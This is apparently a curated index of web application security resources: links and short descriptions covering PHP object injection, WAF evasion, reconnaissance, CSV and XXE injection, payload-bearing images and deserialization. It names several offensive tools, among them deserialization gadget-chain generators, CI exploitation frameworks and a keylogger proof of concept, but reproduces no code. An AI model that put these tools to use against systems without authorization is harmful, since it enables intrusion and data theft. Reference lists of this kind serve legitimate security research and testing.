- In this paper, we study code reuse attacks in the context of PHP-based web applications. We analyze how PHP object injection (POI) vulnerabilities can be exploited via property-oriented programming (POP) and perform a systematic analysis of available gadgets in common PHP applications. Furthermore, we introduce an automated approach to statically detect POI vulnerabilities in object-oriented PHP code. Our approach is also capable of generating POP chains in an automated way. We implemented a prototype of the proposed approach and evaluated it with 10 well-known applications. Overall, we detected 30 new POI vulnerabilities and 28 new gadget chains
- Utilizing Code Reuse/ROP in PHP Application Exploits - BH 2010
- POP-Exploit
- Research into Property Oriented Programming about php applications.
- Code Reuse Attacks in PHP: Automated POP Chain Generation
- Bypassing Disabled Functions
- Type Juggling
- Writeups
- Php Codz Hacking
- Writeups of specific PHP vulns
- Php Codz Hacking
- Learning/Reference
- 101
- Representational State Transfer - Wikipedia
- Microservices
- Service-Oriented-Architecture
- The S stands for Simple
- Satire(Only it's not) of a conversation about SOAP
- RESTful Services, The Web Security Blind Spot
- Learn REST: A Tutorial
- REST and Stateless Session IDs
- Beginner’s Guide to API(REST) security
- Introduction to RESTful APIs with Chris Wahl
- 101
- Talks & Presentations
- Cracking and fixing REST services - Bill Sempf - Converge 2015
- REST, or Representational State Transfer, just refers to the protocol with which the whole Web works. No big. We are used to using REST with a browser, but there is more to it - we can write programs with REST. The problem is that writing properties and functions using the web's transfer protocol open them up to all of the security weaknesses of the web, and we know there are a few of those. Finding those bugs is just half of the battle - fixing them is a whole other story. You'll need the details, and you'll get them here.
- Cracking and fixing REST services - Bill Sempf - Converge 2015
- Attacking
- Tools
- WS-Attacker
- WS-Attacker is a modular framework for web services penetration testing. It is developed by the Chair of Network and Data Security, Ruhr University Bochum (http://nds.rub.de/ ) and the Hackmanit GmbH (http://hackmanit.de/).
- Damn Vulnerable Web Services dvws
- Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities.
- WS-Attacks.org
- WS-Attacks.org is not a new web service standard by the OASIS Group or W3C; instead it presents the flaws of today's web service standards and implementations in regard to web service security! WS-Attacks.org aims at delivering the most comprehensive enumeration of all known web service attacks.
- Astra
- REST API penetration testing is complex due to continuous changes in existing APIs and newly added APIs. Astra can be used by security engineers or developers as an integral part of their process, so they can detect and patch vulnerabilities early during development cycle. Astra can automatically detect and test login & logout (Authentication API), so it's easy for anyone to integrate this into CICD pipeline. Astra can take API collection as an input so this can also be used for testing apis in standalone mode.
- WS-Attacker
- Reference
- Web Services Security Testing Cheat Sheet Introduction - OWASP
- [REST Security Cheat Sheet](REST Security Cheat Sheet)
- REST Assessment Cheat Sheet
- RESTful API Best Practices and Common Pitfalls - Spencer Schneidenbach
- 101
- Articles/Blogposts/Writeups
- Executing commands in ruby
- Attacking Ruby on Rails Applications - phrack
- Going AUTH the Rails on a Crazy Train: A Dive into Rails Authentication and Authorization
- Property Oriented Programming - Applied to Ruby
- Pentesting Django and Rails
- Executing commands in ruby
- Execution of shell code in Ruby scripts
- Tools
- Brakeman
- Brakeman is an open source static analysis tool which checks Ruby on Rails applications for security vulnerabilities.
- Brakeman
- 101
- Web Assembly
- A cartoon intro to WebAssembly Articles
- Lin Clark: A Cartoon Intro to WebAssembly | JSConf EU 2017
- WebAssembly Design Documents
- This repository contains documents describing the design and high-level overview of WebAssembly.
- Articles/Papers/Talks/Writeups
- Tools
- WebAssembly for .NET
- A library able to create, read, modify, write and execute WebAssembly (WASM) files from .NET-based applications. Execution does not use an interpreter. WASM instructions are mapped to their .NET equivalents and converted to native machine language by the .NET JIT compiler.
- WebAssembly for .NET
- Reversing
- Web-(Dis)Assembly - Christophe Alladoum - Shakacon X
https://github.com/sophos/WebAssembly/blob/master/Misc/Web-(Dis)Assembly.pdf
- Analyzing WebAssembly binaries: initial feel and behavioral analysis - John Bergbom
- Analyzing WebAssembly binaries - Wasm Reverse Engineering - John Bergbom
- Manual reverse engineering of WebAssembly: static code analysis - John Bergbom
- Web-(Dis)Assembly - Christophe Alladoum - Shakacon X
- 101
- Articles/Blogposts/Writeups
- 101
- Articles/Blogposts/Writeups
- Talks & Presentations
- Dupe Key Confusion
- attack to bypass XML signature verification by sending multiple key identifiers in the KeyInfo section. Vulnerable systems will use the first one to verify the XML signature and the second one to verify the trust on the signing party. This plugin applies this technique to SAML tokens by allowing to modify and then resign the SAML assertion with an arbitrary attacker-controlled key which is then send as the first element of the KeyInfo section, while the original key identifier is sent as the second key identifier.
- Tools
- Web Application Firewalls
- ModSecurity
- ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx that is developed by Trustwave's SpiderLabs. It has a robust event-based programming language which provides protection from a range of attacks against web applications and allows for HTTP traffic monitoring, logging and real-time analys
- Shadow Daemon
- Shadow Daemon is a collection of tools to detect, protocol and prevent attacks on web applications. Technically speaking, Shadow Daemon is a web application firewall that intercepts requests and filters out malicious parameters. It is a modular system that separates web application, analysis and interface to increase security, flexibility and expandability. Shadow Daemon is free software. It is released under the license GPLv2, so its source code can be examined, modified and distributed by everyone.
- ModSecurity
- Articles/Blogposts/Writeups
- Bypassing WAFs
- WAF Bypass Cheatsheet/gitbook
- Web Application Firewall (WAF) Evasion Techniques - theMiddle
- Web Application Firewall (WAF) Evasion Techniques #2 - theMiddle
- Web Application Firewall (WAF) Evasion Techniques - secjuice
- Bypassing Web-Application Firewalls by abusing SSL/TLS - 0x09AL
- Request encoding to bypass web application firewalls - NCCGroup
- Bypassing Web-Application Firewalls by abusing SSL/TLS - 0x09AL
- Talks & Presentations
- HTTP Invisibility Cloak by Soroush Dalili - SteelCon2017
- This talk illustrates a number of techniques to smuggle and reshape HTTP requests using features such as HTTP Pipelining that are not normally used by testers. The strange behaviour of web servers with different technologies will be reviewed using HTTP versions 1.1, 1.0, and 0.9 before HTTP v2 becomes too popular! Some of these techniques might come in handy when dealing with a dumb WAF or load balancer that blocks your attacks.
- HTTP Invisibility Cloak by Soroush Dalili - SteelCon2017
- Tools
- WhatWaf
- WhatWaf is an advanced firewall detection tool who's goal is to give you the idea of "There's a WAF?". WhatWaf works by detecting a firewall on a web application, and attempting to detect a bypass (or two) for said firewall, on the specified target.
- WAFPASS
- Analysing parameters with all payloads' bypass methods, aiming at benchmarking security solutions like WAF.
- WAF_buster
- LightBulb
- LightBulb is an open source python framework for auditing web application firewalls and filters.
- WAFNinja
- WAFNinja is a tool which contains two functions to attack Web Application Firewalls.
- Web Application Firewall Profiling and Evasion - Michael Ritter - OWASP
- Guide To Identifying And Bypassing WAFs
- ftw
- Framework for Testing WAFs (FTW!)
- WhatWaf
- 101
- Articles/Blogposts/Writeups
- Specific Frameworks
- Angular
- Apache Struts
- ASP.NET
- Getting Shell with XAMLX Files - Soroush Dalili
- ASP.NET resource files (.RESX) and deserialisation issues - Soroush Dalili
- Uploading web.config for Fun and Profit 2 - Soroush Dalili
- Technical Advisory: Bypassing Microsoft XOML Workflows Protection Mechanisms using Deserialisation of Untrusted Data - Soroush Dalili
- XAML overview in WPF - docs.ms
- Rare ASP.NET request validation bypass using request encoding - nccgroup
- Understanding ASP.NET View State - docs.ms
- viewstate
- A small Python 3.5+ library for decoding ASP.NET viewstate.
- viewgen
- viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
- RCEvil.NET
- RCEvil.NET is a tool for signing malicious ViewStates with a known validationKey. Any (even empty) ASPX page is a valid target. See http://illuminopi.com/ for full details on the attack vector.
- Flask
- See SSI/Template Injection
- Injecting Flask - Ryan Reid
- In this adventure we will discuss some of the security features available and potential issues within the Flask micro-framework with respect to Server-Side Template Injection, Cross-Site Scripting, and HTML attribute injection attacks, a subset of XSS. If you’ve never had the pleasure of working with Flask, you’re in for a treat. Flask is a lightweight python framework that provides a simple yet powerful and extensible structure (it is Python after all).
- mustache.js
- mustache-security(2013)
- This place will host a collection of security tips and tricks for JavaScript MVC frameworks and templating libraries.
- Wikis
- mustache-security(2013)
- ReactJS
- Spring
- 101
- Articles/Blogposts/Writeups
- Tools
- Burpsuite
- Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
- ZAP - Zed Attack Proxy
- The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing. ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
- Paros - Web Proxy
- A Java based HTTP/HTTPS proxy for assessing web application vulnerability. It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.
- Mallory: Transparent TCP and UDP Proxy
- Mallory is a transparent TCP and UDP proxy. It can be used to get at those hard to intercept network streams, assess those tricky mobile web applications, or maybe just pull a prank on your friend.
- TCP Catcher
- TcpCatcher is a free TCP, SOCKS, HTTP and HTTPS proxy monitor server software.
- wssip
- Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa.
- ratproxy
- Ratproxy is a semi-automated, largely passive web application security audit tool. It is meant to complement active crawlers and manual proxies more commonly used for this task, and is optimized specifically for an accurate and sensitive detection, and automatic annotation, of potential problems and security-relevant design patterns based on the observation of existing, user-initiated traffic in complex web 2.0 environments.
- Burpsuite
- Apache
- Jetty
- NGINX
- Attacking
- Securing
- Center for Internet Security Apache Server 2.4 Hardening Guide
- Securing Web Application Technologies Checklist
- Wordpress Security Guide - WPBeginner
- API Security Checklist
- OWASP Application Security Verification Standard Project(ASVS)
- The OWASP Application Security Verification Standard (ASVS) Project provides a basis for testing web application technical security controls and also provides developers with a list of requirements for secure development.
- Magical Code Injection Rainbow Framework
- The Magical Code Injection Rainbow! MCIR is a framework for building configurable vulnerability testbeds. MCIR is also a collection of configurable vulnerability testbeds. Has testing lessons for xss/csrf/sql
- Guides & Methodologies
- OWASP Testing Checklist
- WebAppSec Testing Checklist
- OWASP Testing Checklist(OTGv4)
- OWASP based Web Application Security Testing Checklist is an Excel based checklist which helps you to track the status of completed and pending test cases. This checklist is completely based on OWASP Testing Guide v 4. The OWASP Testing Guide includes a “best practice” penetration testing framework which users can implement in their own organizations and a “low level” penetration testing guide that describes techniques for testing most common web application security issues. Moreover, the checklist also contains OWASP Risk Assessment Calculator and Summary Findings template.
- LTR101: Web App Testing - Methods to The Madness - Andy Gill
- LTR101: Web Application Testing Methodologies - Andy Gill
- Payloads
- Tactics
- General Reconnaissance Techniques
- Insecure HTTP Header Removal
- Backslash Powered Scanning: Hunting Unknown Vulnerability Classes
- Existing web scanners search for server-side injection vulnerabilities by throwing a canned list of technology-specific payloads at a target and looking for signatures - almost like an anti-virus. In this document, I'll share the conception and development of an alternative approach, capable of finding and confirming both known and unknown classes of injection vulnerabilities. Evolved from classic manual techniques, this approach reaps many of the benefits of manual testing including casual WAF evasion, a tiny network footprint, and flexibility in the face of input filtering.
- Attack Surface Reconaissance
- Articles/Blogposts/Writeups
- Tools
- AttackSurfaceMapper
- Attack Surface Mapper is a reconnaissance tool that uses a mixture of open source intellgence and active techniques to expand the attack surface of your target. You feed in a mixture of one or more domains, subdomains and IP addresses and it uses numerous techniques to find more targets. It enumerates subdomains with bruteforcing and passive lookups, Other IPs of the same network block owner, IPs that have multiple domain names pointing to them and so on. Once the target list is fully expanded it performs passive reconnaissance on them, taking screenshots of websites, generating visual maps, looking up credentials in public breaches, passive port scanning with Shodan and scraping employees from LinkedIn.
- intrigue-core
- Intrigue-core is a framework for external attack surface discovery and automated OSINT.
- Domain Analyzer
- Domain analyzer is a security analysis tool which automatically discovers and reports information about the given domain. Its main purpose is to analyze domains in an unattended way.
- domain-profiler
- domain-profiler is a tool that uses information from various sources (Whois, DNS, SSL, ASN) to determine what decisions have been made regarding a domain or list of domains.
- The Hamburglar
- Hamburglar -- collect useful information from urls, directories, and files
- AttackSurfaceMapper
- (Sub)Domain Reconnaissance
- Articles/Blogposts/Writeups
- Domain Discovery
- DRROBOT
- Dr.ROBOT is a tool for Domain Reconnaissance and Enumeration. By utilizing containers to reduce the overhead of dealing with dependencies, inconsistencies across operating systems, and different languages, Dr.ROBOT is built to be highly portable and configurable.
- DRROBOT
- Subdomain Discovery Tools
- Sudomy
- Sudomy is a subdomain enumeration tool, created using a bash script, to analyze domains and collect subdomains in fast and comprehensive way.
- domains-from-csp
- A Python script to parse domain names from CSP header
- pdlist. A passive subdomain finder
- pdlist is a passive subdomain finder written in python3. This tool can be used effectively to collect information about a domain without ever sending a single packet to any of its hosts. Given a domain like "example.com" it will find all the hosts which have a
hostname <something>.example.com
or URLs strictly related toexample.com
.
- pdlist is a passive subdomain finder written in python3. This tool can be used effectively to collect information about a domain without ever sending a single packet to any of its hosts. Given a domain like "example.com" it will find all the hosts which have a
- Sudomy
- Subdomain Takeover
- Virtual Hosts
- 101
- Tools
- virtual-host-discovery
- This is a basic HTTP scanner that'll enumerate virtual hosts on a given IP address. During recon, this might help expand the target by detecting old or deprecated code. It may also reveal hidden hosts that are statically mapped in the developer's /etc/hosts file.
- blacksheepwall
- blacksheepwall is a hostname reconnaissance tool
- VHostScan
- A virtual host scanner that performs reverse lookups, can be used with pivot tools, detect catch-all scenarios, work around wildcards, aliases and dynamic default pages.
- virtual-host-discovery
- Visual Reconnaissance
- Articles/Blogposts/Writeups
- Tools
- PowerWebShot
- A PowerShell tool for taking screenshots of multiple web servers quickly.
- HTTrack - Website Copier
- It allows you to download a World Wide Web site from the Internet to a local directory, building recursively all directories, getting HTML, images, and other files from the server to your computer. HTTrack arranges the original site's relative link-structure. Simply open a page of the "mirrored" website in your browser, and you can browse the site from link to link, as if you were viewing it online. HTTrack can also update an existing mirrored site, and resume interrupted downloads. HTTrack is fully configurable, and has an integrated help system.
- Kraken
- Kraken is a tool to help make your web interface testing workflow more efficient. This is done by using Django, Apache, and a MySql database to store and organize web interface screenshots and data. This allows you and your team to take notes and track which hosts have been tested simultaniously. Once you are finished, you can view these notes you took and generate reports in the Reports section.
- Eyeballer
- Eyeballer is meant for large-scope network penetration tests where you need to find "interesting" targets from a huge set of web-based hosts. Go ahead and use your favorite screenshotting tool like normal (EyeWitness or GoWitness) and then run them through Eyeballer to tell you what's likely to contain vulnerabilities, and what isn't.
- gowitness
- gowitness is a website screenshot utility written in Golang, that uses Chrome Headless to generate screenshots of web interfaces using the command line. Both Linux and macOS is supported, with Windows support 'partially working'.
- webscreenshot
- A simple script to screenshot a list of websites, based on the url-to-image PhantomJS script.
- LazyShot
- The simplest way to take an automated screenshot of given URLs. Easy installation!
- RAWR - Rapid Assessment of Web Resources
- PowerWebShot
- 3rd Party Hosted Tools
- VisualSiteMapper
- Visual Site Mapper is a free service that can quickly show a map of your site.
- VisualSiteMapper
- Recon
- HTTPLeaks
- HTTPLeaks - All possible ways, a website can leak HTTP requests
- General
- hackability
- Rendering Engine Hackability Probe performs a variety of tests to discover what the unknown rendering engine supports. To use it simply extract it to your web server and visit the url in the rendering engine you want to test. The more successful probes you get the more likely the target engine is vulnerable to attack.
- hackability
- Content/Folder Discovery
- Tachyon
- Tachyon is a Fast Multi-Threaded Web Discovery Tool
- dirsearch
- dirsearch is a simple command line tool designed to brute force directories and files in websites.
- LinkFinder
- LinkFinder is a python script written to discover endpoints and their parameters in JavaScript files. This way penetration testers and bug hunters are able to gather new, hidden endpoints on the websites they are testing. Resulting in new testing ground, possibility containing new vulnerabilities. It does so by using jsbeautifier for python in combination with a fairly large regular expression.
- Tachyon
- JS-based scanning
- Web Page
- Web Server
- WhatWeb
- httprecon - Advanced Web Server Fingerprinting
- The httprecon project is doing some research in the field of web server fingerprinting, also known as http fingerprinting. The goal is the highly accurate identification of given httpd implementations. This is very important within professional vulnerability analysis. Besides the discussion of different approaches and the documentation of gathered results also an implementation for automated analysis is provided. This software shall improve the easyness and efficiency of this kind of enumeration. Traditional approaches as like banner-grabbing, status code enumeration and header ordering analysis are used. However, many other analysis techniques were introduced to increase the possibilities of accurate web server fingerprinting. Some of them were already discussed in the book Die Kunst des Penetration Testing (Chapter 9.3, HTTP-Fingerprinting, pp. 530-550).
- HTTPLeaks
- HTTP Enumeration
- Articles/Blogposts/Writeups
- Tools
- Arjun
- HTTP parameter discovery suite.
- Psi-Probe
- Advanced manager and monitor for Apache Tomcat, forked from Lambda Probe
- HTTPie - curl for humans
- HTTPie (pronounced aych-tee-tee-pie) is a command line HTTP client. Its goal is to make CLI interaction with web services as human-friendly as possible. It provides a simple http command that allows for sending arbitrary HTTP requests using a simple and natural syntax, and displays colorized output. HTTPie can be used for testing, debugging, and generally interacting with HTTP servers.
- Arjun
- Enpdoint Discovery
- Articles/Blogposts/Writeups
- Tools
- LinkFinder
- A python script that finds endpoints in JavaScript files
- LinkFinder
- A python script that finds endpoints in JavaScript files
- JSParser
- A python 2.7 script using Tornado and JSBeautifier to parse relative URLs from JavaScript files. Useful for easily discovering AJAX requests when performing security research or bug bounty hunting.
- LinkFinder
- Forced-Browsing
- Articles/Blogposts/Writeups
- Tools
- Tachyon
- Dirsearch
- OpenDoor
- OpenDoor OWASP is console multifunctional web sites scanner. This application find all possible ways to login, index of/ directories, web shells, restricted access points, subdomains, hidden data and large backups. The scanning is performed by the built-in dictionary and external dictionaries as well. Anonymity and speed are provided by means of using proxy servers.
- ffuf - Fuzz Faster U Fool
- A fast web fuzzer written in Go.
- rustbuster
- A Comprehensive Web Fuzzer and Content Discovery Tool
- Site/Technology Identification
- WhatWeb
- WhatWeb identifies websites. Its goal is to answer the question, "What is that Website?". WhatWeb recognises web technologies including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices. WhatWeb has over 1500 plugins, each to recognise something different. WhatWeb also identifies version numbers, email addresses, account IDs, web framework modules, SQL errors, and more.
- CMSExplorer
- CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. Additionally, CMS Explorer can be used to aid in security testing. While it performs no direct security checks, the "explore" option can be used to reveal hidden/library files which are not typically accessed by web clients but are nonetheless accessible. This is done by retrieving the module's current source tree and then requesting those file names from the target system. These requests can be sent through a distinct proxy to help "bootstrap" security testing tools like Burp, Paros, Webinspect, etc.
- BlindElephant Web Application Fingerprinter
- The BlindElephant Web Application Fingerprinter attempts to discover the version of a (known) web application by comparing static files at known locations against precomputed hashes for versions of those files in all all available releases. The technique is fast, low-bandwidth, non-invasive, generic, and highly automatable.
- Fingerprinter
- CMS/LMS/Library etc Versions Fingerprinter. This script's goal is to try to find the version of the remote application/third party script etc by using a fingerprinting approach.
- Web Filter External Enumeration Tool (WebFEET)
- WebFEET is a web application for the drive-by enumeration of web security proxies and policies. See associated white paper (Drive-by enumeration of web filtering solutions)
- Fingerprinter
- This script goal is to try to find the version of the remote application/third party script etc by using a fingerprinting approach.
- WhatWeb
- Vulnerability Scanner
- Nikto
- Spaghetti - Web Application Security Scanner
- Spaghetti is an Open Source web application scanner, it is designed to find various default and insecure files, configurations, and misconfigurations. Spaghetti is built on python2.7 and can run on any platform which has a Python environment.
- skipfish
- Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.
- wikto
- Wikto is Nikto for Windows - but with a couple of fancy extra features including Fuzzy logic error code checking, a back-end miner, Google assisted directory mining and real time HTTP request/response monitoring. Wikto is coded in C# and requires the .NET framework.
- WATOBO
- WATABO is a security tool for testing web applications. It is intended to enable security professionals to perform efficient (semi-automated) web application security audits.
- YASUO
- Yasuo is a ruby script that scans for vulnerable 3rd-party web applications.
- ParrotNG
- ParrotNG is a tool capable of identifying Adobe Flex applications (SWF) vulnerable to CVE-2011-2461
- Arachni Web Scanner
- Arachni is an Open Source, feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. It is smart, it trains itself by monitoring and learning from the web application's behavior during the scan process and is able to perform meta-analysis using a number of factors in order to correctly assess the trustworthiness of results and intelligently identify (or avoid) false-positives.
- Pyfiscan
- Pyfiscan is free web-application vulnerability and version scanner and can be used to locate out-dated versions of common web-applications in Linux-servers. Example use case is hosting-providers keeping eye on their users installations to keep up with security-updates. Fingerprints are easy to create and modify as user can write those in YAML-syntax. Pyfiscan also contains tool to create email alerts using templates.
- autochrome
- This tool downloads, installs, and configures a shiny new copy of Chromium.
- Article
- jsgifkeylogger
- a javascript keylogger included in a gif file This is a PoC
- Dirbuster
- DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. Often is the case now of what looks like a web server in a state of default installation is actually not, and has pages and applications hidden within. DirBuster attempts to find these.
- Go Buster
- Directory/file busting tool written in Go
- Recursive, CLI-based, no java runtime
- WFuzz
- Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for finding resources not linked (directories, servlets, scripts, etc), bruteforce GET and POST parameters for checking different kind of injections (SQL, XSS, LDAP,etc), bruteforce Forms parameters (User/Password), Fuzzing,etc
- dirsearch
- dirsearch is a simple command line tool designed to brute force directories and files in websites.
- Tachyon * Tachyon is a Fast Multi-Threaded Web Discovery Tool
- Syntribos
- Given a simple configuration file and an example HTTP request, syntribos can replace any API URL, URL parameter, HTTP header and request body field with a given set of strings. Syntribos iterates through each position in the request automatically. Syntribos aims to automatically detect common security defects such as SQL injection, LDAP injection, buffer overflow, etc. In addition, syntribos can be used to help identify new security defects by automated fuzzing.
- cider - Continuous Integration and Deployment Exploiter
- CIDER is a framework written in node js that aims to harness the functions necessary for exploiting Continuous Integration (CI) systems and their related infrastructure and build chain (eg. Travis-CI, Drone, Circle-CI). Most of the exploits in CIDER exploit CI build systems through open GitHub repositories via malicious Pull Requests. It is built modularly to encourage contributions, so more exploits, attack surfaces, and build chain services will be integrated in the future.
- Rotten Apple
- A tool for testing continuous integration (CI) or continuous delivery (CD) system security
- Exploiting Continuous Integration (CI) and Automated Build Systems - spaceb0x
- 101
- Articles/Blogposts/Writeups
- Everything about the CSV Excel Macro Injection - Ishaq Mohammed
- From CSV to CMD to qwerty - exploresecurity
- Everything about the CSV Excel Macro Injection - Ishaq Mohammed
- Tricks to improve web app excel export attacks(Slides) - Jerome Smith - CamSec2016
- Video
- This presentation is an embellished version of the second half of a talk originally presented at BSides MCR 2016. It covers more general web app export issues as well as revisions on the DDE content following feedback from BSides. This talk also had more demos.
- CSV Injection Revisited - Making Things More Dangerous(and fun) - Andy Gill
- From CSV to Meterpreter - XPNSec
- CSV Injection- There's devil in the detail - Sunil Joshi
- CSV injection: Basic to Exploit!!!! - Akansha Kesharwani
- [Cell Injection] Attacking the end user through the application - David Stubley
- The Absurdly Underestimated Dangers of CSV Injection - George Mauer
- Data Extraction to Command Execution CSV Injection - Jamie Rougvie
- Comma Separated Vulnerabilities
- This post introduces Formula Injection, a technique for exploiting ‘Export to Spreadsheet’ functionality in web applications to attack users and steal spreadsheet contents. It also details a command injection exploit for Apache OpenOffice and LibreOffice that can be delivered using this technique.
- [Cell Injection] Attacking the end user through the application - 7elements.co.uk
- Microsoft Excel CSV code execution/injection method - xor %eax,%eax
- Talks & Presentations
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- HTML Form Protocol Attack - Jochen Topf(2001)
- This paper describes how some HTML browsers can be tricked through the use of HTML forms into sending more or less arbitrary data to any TCP port. This can be used to send commands to servers using ASCII based protocols like SMTP, NNTP, POP3, IMAP, IRC, and others. By sending HTML email to unsuspecting users or using a trojan HTML page, an attacker might be able to send mail or post Usenet News through servers normally not accessible to him. In special cases an attacker might be able to do other harm, e.g. deleting mail from a POP3 mailbox.
- HTML Form Protocol Attack - Jochen Topf(2001)
- Presentations/Talks/Videos
- Tools
- Extract data
- Extract data is a demo combining a cross-protocol request attack with DNS rebinding
- Extract data
- 101
- Articles/Blogposts/Writeups
- Content-Type Blues - Neil Bergman
- Exploiting CVE-2011-2461 on google.com - Mauro Gentile
- Cross-Site Content (Data) Hijacking (XSCH) PoC Project
- Even uploading a JPG file can lead to Cross-Site Content Hijacking (client-side attack)! - Soroush Dalili
- Same Origin Policy Weaknesses - Kuza55
- The lesser known pitfalls of allowing file uploads on your website - Mathias Karlsson, Frans Rosén
- Papers
- Presentations/Talks/Videos
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- Onsite-Request-Forgery
- 101
- Articles/Blogposts/Writeups
- Presentations/Talks/Videos
- 101
- Articles/Blogposts/Presentations/Talks/Videos
- Tools
- Unphp.net php decoder
- Various forms of encoding/decoding web app
- Javascript De-Obfuscation Tools Redux
- Back in 2011, I took a look at several tools used to deobfuscate Javascript. This time around I will use several popular automated and semi-automated/manual tools to see how they would fare against today’s obfuscated scripts with the least amount of intervention.
- Javascript Deobfuscator - kahusecurity
- Revelo - kahusecurity
- --> See XML section
- Hunting in the Dark - Blind XXE
- Security Implications of DTD Attacks Against a Wide Range of XML Parsers
- Comma Separated Vulnerabilities
- Exploiting Out Of Band XXE using internal network and php wrappers - Mahmoud Gamal
- Playing with Content-Type – XXE on JSON Endpoints - Antti Rantasaari
- Exploiting CVE-2016-4264 With OXML_XXE
- XXE: How to become a Jedi - Yaroslav Babin(Zeronights 2017)
- Exploiting XXE Vulnerabilities In File Parsing Functionality - Willis Vandevanter - BHUSA 2015
- In this 25-minute briefing, we will discuss techniques for exploiting XXE vulnerabilities in File Parsing/Upload functionality. Specifically, XML Entity Attacks are well known, but their exploitation inside XML supported file formats such as docx, xlsx, pptx, and others are not. Discussing the technically relevant points step by step, we will use real world examples from products and recent bug bounties. Finally, in our experience, creating 'XXE backdoored' files can be a very slow process. We will introduce our battle tested tool for infecting the file formats discussed.
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- Execution After Redirect
- Open Redirect
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- fuxploider
- File upload vulnerability scanner and exploitation tool.
- fuxploider
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Tools
- 101
- Articles/Blogposts/Writeups
- Revisiting XSS payloads in PNG IDAT chunks - Adam Logue
- An XSS on Facebook via PNGs & Wonky Content Types - [email protected]
- Encoding Web Shells in PNG IDAT chunks - idontplaydarts
- Bypassing CSP using polyglot JPEGs - Gareth Heyes
- Hacking group using Polyglot images to hide malvertising attacks - Josh Summit
- BMP/x86 Polyglot - [email protected]
- Upload a web.config File for Fun & Profit - Soroush Dalili
- Uploading web.config for Fun and Profit 2 - Soroush Dalili
- Encoding Web Shells in PNG IDAT chunks - phil
- An XSS on Facebook via PNGs & Wonky Content Types - fin1te
- Tools
- xss2png
- A simple tool to generate PNG images with XSS payloads stored in PNG IDAT chunks
- pixload
- Set of tools for creating/injecting payload into images.
- PNG-IDAT-Payload-Generator
- Generate a PNG with a payload embedded in the IDAT chunk (Based off of previous concepts and code -- credit in README)
- Imagecreatefromgif-Bypass
- xss2png
- 101
- Articles/Blogposts/Writeups
- Papers
- Presentations/Talks/Videos
- Popular Approaches to Preventing Code Injection Attacks are Dangerously Wrong - AppSecUSA 2017
- Remote Code Execution in Firefox beyond memory corruptions(2019) - Frederik Braun
- Browsers are complicated enough to have attack surface beyond memory safety issues. This talk will look into injection flaws in the user interface of Mozilla Firefox, which is implemented in JS, HTML, and an XML-dialect called XUL. With an Cross-Site Scripting (XSS) in the user interface attackers can execute arbitrary code in the context of the main browser application process. This allows for cross-platform exploits of high reliability. The talk discusses past vulnerabilities and will also suggest mitigations that benefit Single Page Applications and other platforms that may suffer from DOM-based XSS, like Electron.
- Tools
- See also: JNDI, JSON, SQLi, XSS
- General
- Testing
- Tools
- Writeups
- General
- Testing
- jndipoc
- Proof of concept showing how java byte code can be injected through InitialContext.lookup() calls
- jndipoc
- Tools
- Writeups
- General
- .NET
- Articles/Blogposts/Writeups
- .NET Serialization: Detecting and defending vulnerable endpoints - Alvaro Munoz
- ASP.NET resource files (.RESX) and deserialisation issues - Soroush Dalili
- RCEVIL.NET: A Super Serial Story - Jared McLaren(BSides Iowa2019)
- HITCON 2018: Why so Serials? Write-up - cyku.tw
- HITCON CTF 2018 - Why so Serials? Writeup - Orange
- Talks/Presentations/Videos
- Papers
- Tools
- YSoSerial.Net
- ysoserial.net is a collection of utilities and property-oriented programming "gadget chains" discovered in common .NET libraries that can, under the right conditions, exploit .NET applications performing unsafe deserialization of objects. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes this data, the chain will automatically be invoked and cause the command to be executed on the application host.
- YSoSerial.Net
- Articles/Blogposts/Writeups
- Java
- Articles/Blogposts/Writeups
- General
- Java-Deserialization-Cheat-Sheet
- A cheat sheet for pentesters about Java Native Binary Deserialization vulnerabilities
- Java-Deserialization-Cheat-Sheet
- Presentations/Talks/Videos
- Papers
- Java Unmarshaller Security - Turning your data into code execution
- This paper presents an analysis, including exploitation details, of various Java open-source marshalling libraries that allow(ed) for unmarshalling of arbitrary, attacker supplied, types and shows that no matter how this process is performed and what implicit constraints are in place it is prone to similar exploitation techniques.
- tool from the above paper: marshalsec
- Java Unmarshaller Security - Turning your data into code execution
- Tools
- Break Fast Serial
- A proof of concept that demonstrates asynchronous scanning for Java deserialization bugs
- ysoserial
- JMET
